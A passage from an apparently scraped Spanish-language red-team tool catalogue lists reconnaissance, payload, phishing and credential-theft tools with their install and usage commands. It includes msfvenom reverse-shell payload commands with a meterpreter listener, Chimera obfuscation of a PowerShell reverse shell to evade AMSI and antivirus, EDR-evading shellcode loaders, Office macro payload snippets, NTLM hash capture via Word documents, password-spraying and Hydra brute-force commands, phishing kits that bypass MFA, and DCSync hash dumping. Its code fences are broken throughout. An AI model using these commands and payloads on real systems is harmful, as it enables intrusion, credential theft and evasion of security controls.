dnsrecon es una herramienta de pyhton para enumerar registros DNS (MX, SOA, NS, A, AAAA, SPF y TXT) y puede proporcionar varios hosts víctimas asociados nuevos en los que pivotar desde una búsqueda de un solo dominio.

Instalación:```bash sudo apt install dnsrecon

root@kitploit:~
**Uso:**```bash
dnsrecon -d google.com

image

🔙shodan.io

Shodan rastrea la infraestructura pública y la muestra en un formato buscable. Usando un nombre de empresa, nombre de dominio, dirección IP es posible descubrir sistemas potencialmente vulnerables relacionados con tu objetivo a través de Shodan.

image

🔙AORT

Herramienta para enumerar subdominios, enumerar DNS, detección de WAF, WHOIS, escaneo de puertos, wayback machine, recolección de correos electrónicos.

Install:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

root@kitploit:~
**Uso:**```python
python3 AORT.py -d google.com

image

🔙spoofcheck

Un programa que verifica si un dominio puede ser suplantado. El programa revisa los registros SPF y DMARC en busca de configuraciones débiles que permitan la suplantación. Además, alertará si el dominio tiene una configuración DMARC que envíe correos o solicitudes HTTP cuando fallan los correos SPF/DKIM.

Los dominios son suplantables si se cumple alguna de las siguientes condiciones:

  • Falta de un registro SPF o DMARC
  • El registro SPF nunca especifica ~all o -all
  • La política DMARC está configurada como p=none o no existe

Instalación:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

root@kitploit:~
**Uso:**```bash
./spoofcheck.py [DOMAIN]

image

🔙AWSBucketDump

AWSBucketDump es una herramienta para enumerar rápidamente buckets S3 de AWS en busca de archivos interesantes. Es similar a un brute forcer de subdominios, pero está diseñada específicamente para buckets S3 y también tiene algunas funciones adicionales que permiten buscar archivos con grep, así como descargar archivos interesantes.

Instalación:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

root@kitploit:~
**Uso:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

Buena herramienta para encontrar información de GitHub con regex, con la capacidad de buscar usuarios y/o proyectos específicos de GitHub.

Instalación:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

root@kitploit:~
**Uso:**```
./githarvester.py

🔙truffleHog

TruffleHog es una herramienta que escanea repositorios git y busca cadenas de alta entropía y patrones que pueden indicar la presencia de secretos, como contraseñas y claves API. Con TruffleHog, puedes encontrar rápida y fácilmente información sensible que pudo haber sido accidentalmente confirmada y enviada a un repositorio.

Instalar (Binarios): Link

Instalar (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

root@kitploit:~
**Uso:**```
trufflehog https://github.com/trufflesecurity/test_keys

image

🔙Dismap

Dismap es una herramienta de descubrimiento e identificación de activos. Puede identificar rápidamente protocolos e información de huellas digitales como web/tcp/udp, localizar tipos de activos, y es adecuada para redes internas y externas.

Dismap cuenta con una base de reglas de huellas digitales completa, que actualmente incluye huellas digitales de protocolos tcp/udp/tls y más de 4500 reglas de huellas digitales web, que permiten identificar favicon, body, header, etc.

Instalación:

Dismap es un archivo binario para Linux, MacOS y Windows. Ve a Release para descargar la versión correspondiente y ejecutar:```bash

Linux or MacOS

chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h

Windows

dismap-0.3-windows-amd64.exe -h

root@kitploit:~
**Uso:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

Imagen usada de https://github.com/zhzyker/dismap

🔙enum4linux

Una herramienta para enumerar información de sistemas Windows y Samba.

Se puede usar para recopilar una amplia gama de información, incluyendo:

  • Información del dominio y del controlador de dominio
  • Información de usuarios y grupos locales
  • Recursos compartidos y permisos de recursos compartidos
  • Políticas de seguridad
  • Información de Active Directory

Instalación: (Apt)```bash sudo apt install enum4linux

root@kitploit:~
**Instalación: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

Uso:```bash

'Do everything'

enum4linux.pl -a 192.168.2.55

Obtain list of usernames (RestrictAnonymous = 0)

enum4linux.pl -U 192.168.2.55

Obtain list of usernames (using authentication)

enum4linux.pl -u administrator -p password -U 192.168.2.55

Get a list of groups and their members

enum4linux.pl -G 192.168.2.55

Verbose scan

enum4linux.pl -v 192.168.2.55

root@kitploit:~
Full usage information can be found in this [blog](https://labs.portcullis.co.uk/tools/enum4linux/).

![image](https://assets.kitploit.com/production/public/readmes/147/fe00ba9f2f4658aa8611e2deabd598ed9ded034e10dca68bc7ebfcb901597d8d.png)

*Imagen usada de https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/*

### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)

Escáner de dns/red/puerto peligrosamente rápido, creado por [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), escrito en rust.

Necesitará un archivo de subdominios. *Por ejemplo, [Lista de palabras de subdominios de Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*.

**Instalación:** 

Descargue la última versión desde [aquí](https://github.com/Esc4iCEscEsc/skanuvaty/releases).```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

Uso:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a12af6eef4cb46b200b8d1ea7e42ad172285a5263ce609aff1902ead120ec20d.png)

*Imagen usada de https://github.com/Esc4iCEscEsc/skanuvaty*

### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)

Metabigor es una herramienta de inteligencia, su objetivo es realizar tareas de OSINT y más, pero sin necesidad de ninguna clave API.

**Características principales:**

- Búsqueda de información sobre direcciones IP, ASN y organizaciones.
- Wrapper para ejecutar rustscan, masscan y nmap de manera más eficiente en IP/CIDR.
- Encontrar más dominios relacionados con el objetivo aplicando diversas técnicas (certificado, whois, Google Analytics, etc.).
- Obtener un resumen sobre la dirección IP (impulsado por [@thebl4ckturtle](https://github.com/theblackturtle))

**Instalación:**```bash
go install github.com/j3ssie/metabigor@latest

Uso:```bash

discovery IP of a company/organization

echo "company" | metabigor net --org -o /tmp/result.txt

Getting more related domains by searching for certificate info

echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

Only run rustscan with full ports

echo '1.2.3.4/24' | metabigor scan -o result.txt

Reverse Whois to find related domains

echo 'example.com' | metabigor related -s 'whois'

Get Google Analytics ID directly from the URL

echo 'https://example.com' | metabigor related -s 'google-analytic'

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/55dd22bbf9b6790285f8373fe31c699f489c60f4541a6223af9b7cd77faf5a61.png)

*Imagen usada de https://github.com/j3ssie/metabigor*

### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)

Gitrob es una herramienta para ayudar a encontrar archivos potencialmente sensibles subidos a repositorios públicos en Github. 

Gitrob clonará repositorios pertenecientes a un usuario u organización hasta una profundidad configurable y recorrerá el historial de commits, marcando archivos que coincidan con firmas de archivos potencialmente sensibles. 

Los hallazgos se presentarán a través de una interfaz web para una fácil navegación y análisis.

**Nota:** *Gitrob necesitará un token de acceso de Github para poder interactuar con la API de Github. [Crea un token de acceso personal](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) y guárdalo en una variable de entorno en tu .bashrc o archivo de configuración de shell similar:*```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

Instalación: (Go)```bash go get github.com/michenriksen/gitrob

root@kitploit:~
**Instalar: (Binary)**  

Una [versión precompilada](https://github.com/michenriksen/gitrob/releases) está disponible para cada versión.

**Uso:**```bash
# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

Imagen usada de https://www.uedbox.com/post/58828/

🔙gowitness

Gowitness es una utilidad de captura de pantallas de sitios web escrita en Golang, que utiliza Chrome Headless para generar capturas de pantalla de interfaces web mediante la línea de comandos, con un práctico visor de informes para procesar los resultados. Se admite tanto Linux como macOS, y el soporte para Windows funciona en su mayoría.

Instalación: (Go)```bash go install github.com/sensepost/gowitness@latest

root@kitploit:~
La información completa de instalación se puede encontrar [aquí](https://github.com/sensepost/gowitness/wiki/Installation).

**Uso:**```bash
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

La información completa de uso se puede encontrar aquí.

image

Imagen utilizada de https://github.com/sensepost/gowitness

Desarrollo de Recursos

🔙remoteInjector

Inyecta un enlace a una plantilla de Word remota en un documento de Word.

Esta utilidad basada en Python modifica el enlace settings.xml.rels de un archivo .docx a una plantilla .dotm alojada de forma remota que contiene una macro VBA, la cual se ejecuta cuando se abre el documento y las macros están habilitadas.

Artículo de blog relacionado

Instalación:```bash git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector

root@kitploit:~
**Uso:**```bash
python3 remoteinjector.py -w https://example.com/template.dotm example.docx

🔙Chimera

Chimera es un script de ofuscación de PowerShell diseñado para evadir soluciones AMSI y antivirus. Procesa PS1 maliciosos conocidos por activar AV y utiliza sustitución de cadenas y concatenación de variables para evitar firmas de detección comunes.

Instalación:```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help

root@kitploit:~
**Uso:**```bash
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p

image

🔙msfvenom

Msfvenom permite la creación de payloads para varios sistemas operativos en una amplia gama de formatos. También admite la ofuscación de payloads para la evasión de AV.

Configurar el Listener```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run

root@kitploit:~
#### Comandos de Msfvenom

**PHP:**```bash
msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

Windows:```bash msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe

root@kitploit:~
**Linux:**```bash
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

root@kitploit:~
**HTA:**```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

image

🔙Shellter

Shellter es una herramienta dinámica de inyección de shellcode, y el primer infectador de PE verdaderamente dinámico jamás creado.

Se puede utilizar para inyectar shellcode en aplicaciones nativas de Windows (actualmente solo aplicaciones de 32 bits).

Shellter aprovecha la estructura original del archivo PE y no aplica ninguna modificación como cambiar los permisos de acceso a memoria en las secciones (a menos que el usuario lo desee), agregar una sección adicional con acceso RWE, o cualquier cosa que parezca sospechosa bajo un escaneo AV.

La información completa del README se puede encontrar aquí.

Instalación: (Kali)```bash apt-get update apt-get install shellter

root@kitploit:~
**Instalación: (Windows)** 

Visita la [página de descarga](https://www.shellterproject.com/download/) e instala.

**Uso:** 

Simplemente elige un binario legítimo para puerta trasera y ejecuta Shellter.

Algunos consejos útiles se pueden encontrar [aquí](https://www.shellterproject.com/tipstricks/).

Muchas demostraciones de uso de la comunidad se pueden encontrar [aquí](https://www.shellterproject.com/shellter-community-demos/).

![image](https://assets.kitploit.com/production/public/readmes/147/04c2d11a2a571a26ec7c16cff3fb5d9298164340e32e8efd8ee3f8baac079ef6.png)

*Imagen utilizada de https://www.kali.org/tools/shellter/images/shellter.png*

### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze)

Freeze es una herramienta de creación de payloads utilizada para evadir los controles de seguridad EDR y ejecutar shellcode de manera sigilosa. 

Freeze utiliza múltiples técnicas no solo para eliminar los hooks de EDR en espacio de usuario, sino también para ejecutar shellcode de manera que evite otros controles de monitoreo de endpoints.

**Instalación:**```bash
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go

Uso:``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/6c3f90681a6549cbc77c48fc0ced412b27f85d65b44c0cf32224d245ae1c994c.png)

*Imagen utilizada de https://www.blackhatethicalhacking.com/tools/freeze/*

### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal)

Este script creará un documento de Microsoft Word con una imagen remota, lo que permitirá la captura de hashes NTML desde un endpoint víctima remoto.

Microsoft Word tiene la capacidad de incluir imágenes desde ubicaciones remotas, incluyendo una imagen remota alojada en un servidor SMB controlado por un atacante. Esto te brinda la oportunidad de escuchar y capturar hashes NTLM que se envían cuando una víctima autenticada abre el documento de Word y renderiza la imagen.

**Instalación:**```
git clone https://github.com/0x09AL/WordSteal
cd WordSteal

Uso:```bash

Generate document containing 'test.jpg' and start listener

./main.py 127.0.0.1 test.jpg 1

Generate document containing 'test.jpg' and do not start listener

./main.py 127.0.0.1 test.jpg 0\n

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a2683bdc376d7179fc8500aa2cf1636e371e52129800bf51c15b79c364391fbd.png)

*Imagen usada de https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/*

### [🔙](#tool-list)[NTAPI Undocumented Functions](http://undocumented.ntinternals.net/)

Este sitio proporciona información sobre aspectos internos no documentados de Windows, llamadas al sistema, estructuras de datos y otros detalles de bajo nivel del sistema operativo Windows.

Puede ser un recurso valioso para quienes deseen explorar los aspectos internos de Windows con diversos fines, incluido el análisis de vulnerabilidades, el desarrollo de exploits y la escalada de privilegios.

Al desarrollar exploits, comprender los aspectos internos del sistema objetivo es crucial. Este sitio puede ayudar a desarrollar exploits aprovechando los aspectos no documentados de bajo nivel de Windows.

**Uso:**

Visite [http://undocumented.ntinternals.net/](http://undocumented.ntinternals.net/)

![image](https://assets.kitploit.com/production/public/readmes/147/3c88e47b3afc58cee00fe06443626d0ac8354195bf3988c973cfeefdce21d197.png)

*Imagen usada de http://undocumented.ntinternals.net/*

### [🔙](#tool-list)[Kernel Callback Functions](https://codemachine.com/articles/kernel_callback_functions.html)

Esta nota técnica proporciona una lista completa de todas las API exportadas por el kernel de Windows para que los escritores de controladores registren rutinas de devolución de llamada que son invocadas por componentes del kernel en diversas circunstancias.

La mayoría de estas rutinas están documentadas en el Windows Driver Kit (WDK), pero algunas son para uso de controladores integrados.

Las funciones no documentadas se describen brevemente, mientras que las documentadas solo se enumeran aquí como referencia.

**Uso:**

Visite [https://codemachine.com/articles/kernel_callback_functions.html](https://codemachine.com/articles/kernel_callback_functions.html)

![image](https://assets.kitploit.com/production/public/readmes/147/ccdbb9756a5efe851f7366430ee13b1e380ba5a8a3be2e71d93788f7c71f32f7.png)

*Imagen usada de https://codemachine.com*

### [🔙](#tool-list)[OffensiveVBA](https://github.com/S3cur3Th1sSh1t/OffensiveVBA)

Una colección de técnicas ofensivas, scripts y enlaces útiles para lograr ejecución de código y evasión de defensas mediante macros de Office.

**Uso:**

Visite [https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo](https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo)

![image](https://assets.kitploit.com/production/public/readmes/147/a1e2be51d71eb16d0dc2e331e56089899a00da59681226f64a584c249bbde6fd.png)

*Imagen usada de https://github.com/S3cur3Th1sSh1t*

### [🔙](#tool-list)WSH

**Creando payload:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

Ejecutar:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted

root@kitploit:~
### [🔙](#tool-list)HTA

**Creando payload:**```html
<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Ejecutar: Ejecutar archivo

🔙VBA

Creando payload:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

root@kitploit:~
**Ejecutar:** Establecer la función en Auto_Open() en un documento habilitado para macros

Acceso Inicial
====================

### [🔙](#tool-list)[CredMaster](https://github.com/knavesec/CredMaster)

Lanza un ataque de pulverización de contraseñas / fuerza bruta a través de proxies de paso de Amazon AWS, cambiando la dirección IP solicitante para cada intento de autenticación. Esto crea dinámicamente APIs de FireProx para pulverizaciones de contraseñas más evasivas.

CredMaster proporciona un método para ejecutar pulverizaciones de contraseñas anónimas contra puntos finales en una herramienta simple y fácil de usar. La herramienta FireProx proporciona la IP rotativa de la solicitud, mientras que la base de CredMaster falsifica toda la demás información de identificación.

Características:
- Soporta completamente todas las regiones de AWS
- Genera automáticamente APIs para el paso a través de proxy
- Falsifica números de seguimiento de API, IPs de reenvío y otros encabezados de seguimiento de proxy
- Procesamiento multi-hilo
- Contadores de retardo de contraseña y configuración para evadir la política de bloqueo
- Añade fácilmente nuevos plugins
- Completamente anónimo

**Instalación:**```bash
git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt

Para obtener instrucciones completas de instalación, consulta aquí.

Uso:```bash python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json

root@kitploit:~
Esta herramienta requiere claves de acceso a la API de AWS; una guía sobre cómo adquirir estas claves se puede encontrar aquí: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b

![credmaster](https://assets.kitploit.com/production/public/readmes/147/0b3b39000bca40b701781836c94d98cc1efa1c23783a2344bfbf30fde4293d4a.png)

*Imagen usada de https://github.com/knavesec/CredMaster/wiki*

### [🔙](#tool-list)[TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)

TREVORspray es un rociador de contraseñas modular con soporte para hilos, proxy SSH, módulos de botín, ¡y más!

**Instalación:**```bash
pip install https://github.com/blacklanternsecurity/TREVORspray

Uso:```bash

Recon

python3 ./trevorspray --recon evilcorp.com

Enumerate users via OneDrive

python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10

Spray against discovered

python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token

root@kitploit:~
Para obtener instrucciones completas de uso, consulte [aquí](https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365).

![TREVORspray](https://assets.kitploit.com/production/public/readmes/147/7663363d4be94c22481a92a86f36f1777a8f9c4d85ad76ca3df5ee09096deb09.png)

*Imagen usada de https://github.com/blacklanternsecurity/TREVORspray*

### [🔙](#tool-list)[evilqr](https://github.com/kgretzky/evilqr)

Kit que demuestra otro enfoque de un ataque QRLJacking, permitiendo realizar una toma de control remota de cuentas, mediante phishing de códigos QR de inicio de sesión.

Consiste en una extensión de navegador utilizada por el atacante para extraer el código QR de inicio de sesión y una aplicación servidor, que recupera los códigos QR de inicio de sesión para mostrarlos en las páginas de phishing alojadas.

Demostración [video](https://www.youtube.com/watch?v=8pfodWzqMcU)

**Instalación: (Extensión)** 

Puede cargar la extensión en Chrome, mediante la función `Load unpacked`:
https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked

Una vez instalada la extensión, asegúrese de fijar su icono en la barra de extensiones de Chrome, de modo que el icono esté siempre visible.

**Instalación: (Servidor)**```bash
git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat

Uso:

  1. Ejecuta el servidor ejecutando el binario compilado del servidor: ./server/build/evilqr-server
  2. Abre cualquiera de los sitios web compatibles en tu navegador Chrome, con la extensión Evil QR instalada:``` https://discord.com/login https://web.telegram.org/k/ https://whatsapp.com https://store.steampowered.com/login/ https://accounts.binance.com/en/login https://www.tiktok.com/login
root@kitploit:~
3. Asegúrate de que el código QR de inicio de sesión sea visible y haz clic en el icono de la extensión **Evil QR** en la barra de herramientas. Si se reconoce el código QR, el icono debería iluminarse con colores.
4. Abre la URL de la página de phishing del servidor: `http://127.0.0.1:35000` (por defecto)

![evilqr](https://assets.kitploit.com/production/public/readmes/147/f8ff7150038690a1c6608be4071593f736ccb4369d43ebc0af44791c020e2b15.png)

*Imagen utilizada de https://breakdev.org/evilqr-phishing/*

### [🔙](#tool-list)[CUPP](https://github.com/Mebus/cupp)

La forma más común de autenticación es la combinación de un nombre de usuario y una contraseña o frase de contraseña. Las contraseñas a veces se pueden adivinar perfilando al usuario, como una fecha de nacimiento, apodo, dirección, nombre de una mascota o familiar, o una palabra común como Dios, amor, dinero o contraseña.

Por eso nació CUPP.

**Instalación:**```bash
git clone https://github.com/Mebus/cupp;cd cupp

Uso:```bash

Run in interactive mode

python3 ./cupp.py -i

root@kitploit:~
![cupp](https://assets.kitploit.com/production/public/readmes/147/1c9d63a8d34972498c7a267463fc4233869f68059aee885a2b88ce276cfffffb.png)

*Imagen usada de https://github.com/Mebus/cupp*

### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)

Bash Bunny es una herramienta de ataque físico USB y un sistema de entrega de payloads multifunción. Está diseñado para enchufarse al puerto USB de una computadora y puede programarse para realizar diversas funciones, incluyendo manipular y exfiltrar datos, instalar malware y eludir medidas de seguridad.

[hackinglab: Bash Bunny – Guía](https://hackinglab.cz/en/blog/bash-bunny-guide/)

[Documentación de Hak5](https://docs.hak5.org/bash-bunny/)

[Repositorio de payloads útil](https://github.com/hak5/bashbunny-payloads)

[Página del producto](https://hak5.org/products/bash-bunny)

![imagen](https://assets.kitploit.com/production/public/readmes/147/a9fc36ccc8742ad176a0455fea6a50a355f6a873f99ab472c3b81989c3093b66.png)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)

evilginx2 + gophish. (GoPhish) Gophish es un potente framework de phishing de código abierto que facilita la evaluación de la exposición de su organización al phishing. (evilginx2) Framework independiente de ataque man-in-the-middle utilizado para suplantar credenciales de inicio de sesión junto con cookies de sesión, permitiendo eludir la autenticación de dos factores.

**Instalación:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish

Uso:``` Usage: ./setup <subdomain(s)>

  • root domain - the root domain to be used for the campaign
  • subdomains - a space separated list of evilginx2 subdomains, can be one if only one
  • root domain bool - true or false to proxy root domain to evilginx2
  • redirect url - URL to redirect unauthorized Apache requests
  • feed bool - true or false if you plan to use the live feed
  • rid replacement - replace the gophish default "rid" in phishing URLs with this value
  • blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/d21f6533174ab65dbb6ec6fc044fdad87fe0654f01a6be5f17a862588bf9a0ec.png)

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)

Este framework es excelente para crear campañas de acceso inicial, 'SET tiene una serie de vectores de ataque personalizados que te permiten hacer un ataque creíble rápidamente'.

**Instalación:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

Uso:```bash python3 setoolkit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/962be1664db4237288b6ac2bf77cb98be8c69715d67efdc36178eb16e8178e1c.png)

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)

Buena herramienta para ataques de fuerza bruta de inicio de sesión. Puede atacar varios servicios como SSH, FTP, TELNET, HTTP, etc.

**Instalación:**```bash
sudo apt install hydra

Uso:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/c1f8846e81658f9a3679da0ff42c1efc12d30861a6a706c61449b956e14f8417.png)

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)

SquarePhish es una herramienta de phishing avanzada que utiliza una técnica que combina el flujo de autenticación de código de dispositivo OAuth y códigos QR (Vea [PhishInSuits](https://github.com/secureworks/PhishInSuits) para más información sobre el flujo de código de dispositivo OAuth para ataques de phishing).

Pasos del ataque:

- Enviar código QR malicioso a la víctima
- La víctima escanea el código QR con un dispositivo móvil
- La víctima es dirigida al servidor controlado por el atacante (desencadenando el proceso de flujo de autenticación del código de dispositivo OAuth)
- Se envía por correo electrónico a la víctima un código MFA (desencadenando el temporizador de 15 minutos del flujo de código de dispositivo OAuth)
- El atacante consulta la autenticación
- La víctima ingresa el código en el sitio web legítimo de Microsoft
- El atacante guarda el token de autenticación

**Instalación:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

Nota: Antes de usar cualquiera de los módulos, actualice la información requerida en el archivo settings.config indicado con Required.

Uso (Módulo de correo electrónico):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments: -h, --help show this help message and exit

-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL victim email address to send initial QR code email to

root@kitploit:~
**Uso (Módulo del Servidor):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

🔙King Phisher

King Phisher es una herramienta que permite a los atacantes crear y enviar correos electrónicos de phishing a las víctimas para obtener información sensible.

Incluye funciones como plantillas personalizables, gestión de campañas y capacidades de envío de correos electrónicos, lo que la convierte en una herramienta potente y fácil de usar para llevar a cabo ataques de phishing. Con King Phisher, los atacantes pueden dirigirse a individuos u organizaciones con correos de phishing convincentes y específicos, aumentando las posibilidades de éxito en sus ataques.

Instalación (Linux - Cliente y Servidor):```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh

root@kitploit:~
**Uso:**

Una vez que King Phisher haya sido instalado, siga la [página wiki](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) para configurar SSH, la base de datos, el servidor SMTP, etc.

![image](https://assets.kitploit.com/production/public/readmes/147/ab8900f24709e60727b9ae8d91dc00da72eb17a099da35552cfd09ad542e20b5.png)

Ejecución
====================

### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)

Responder es una herramienta para envenenar los protocolos LLMNR y NBT-NS en una red, permitiendo la captura de credenciales y la ejecución de código arbitrario.

Los protocolos LLMNR (Link-Local Multicast Name Resolution) y NBT-NS (NetBIOS Name Service) son utilizados por los sistemas Windows para resolver nombres de host a direcciones IP en una red local. Si un nombre de host no puede resolverse mediante estos protocolos, el sistema difundirá una solicitud para el nombre de host en la red local.

Responder escucha estas transmisiones y responde con una dirección IP falsa, engañando al sistema solicitante para que envíe sus credenciales al atacante.

**Instalación:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

Uso:```bash

Running the tool

./Responder.py [options]

Typical usage

./Responder.py -I eth0 -wrf

root@kitploit:~
Información de uso completa se puede encontrar [aquí](https://github.com/SpiderLabs/Responder#usage).

![image](https://assets.kitploit.com/production/public/readmes/147/1557d2d9375fcf140ae01d21311d11ce93eabb676e40f6eb39ec25e0f4959c12.png)

*Imagen utilizada de https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/*

### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

Una utilidad que forma parte de la biblioteca Impacket y que se puede utilizar para extraer hashes de contraseñas y otros secretos de un sistema Windows.

Lo hace interactuando con la base de datos del Administrador de cuentas de seguridad (SAM) en el sistema y extrayendo los hashes de contraseñas y otra información, como:

- Hashes de contraseñas para cuentas locales
- Tickets y claves de Kerberos
- Secretos LSA

**Instalación:**```bash
python3 -m pip install impacket

Uso:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

DCSync attack and dump the NTLM hashes of all domain users.

